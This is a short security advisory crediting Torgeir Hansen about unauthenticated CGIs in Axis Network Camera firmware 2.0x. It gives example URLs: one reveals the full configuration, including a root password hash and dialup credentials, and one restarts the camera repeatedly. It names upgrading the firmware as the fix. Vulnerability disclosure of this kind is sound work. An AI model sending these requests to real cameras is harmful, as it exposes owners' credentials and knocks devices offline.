|
|
|
|
| |
| Axis Network Cameras suffers from a security flaw in the CGI they include. The vulnerability is that the CGIs are accessible without any requirement for authentication even though they reveal a lot of sensitive information. |
| |
Credit:
The information has been provided by Torgeir Hansen.
|
| |
Vulnerable systems:
Axis Network Cameras firmware 2.0x
Immune systems:
Axis Network Cameras firmware 2.12 and above
The Axis Network Cameras contain two CGIs /cgi-bin/paramtool and /cgi-bin/hwtestio, accessing them requires no authorization of any kind. This seems to be a mis-configuration of the web server.
Paramtool can be used like this: http://<ip_to_webcam>/cgi-bin/paramtool?--blargh
This will show the entire configure of the webcam, including:
root.InternalSecurity.Passwd { root { passwd [ "plAsx1.0CzA.wd" ] (...)
This could also reveal dialup info, like phone-numbers, username, and passwords (If this camera is set up to be serving images through dialup connection).
Then there is also /cgi-bin/hwtestio, which is really a bad thing to allow access to.
The CGI will allow you to restart the Camera as many times as you want ("for testing proposes of course).
Example:
You can do "http://<ip_to_webcam>/cgi-bin/hwtestio?-r242424", and the camera restarts.
Solution:
Upgrading to the latest firmware solves both these issues.
|
|
|
|
|
|
|
|
|
|
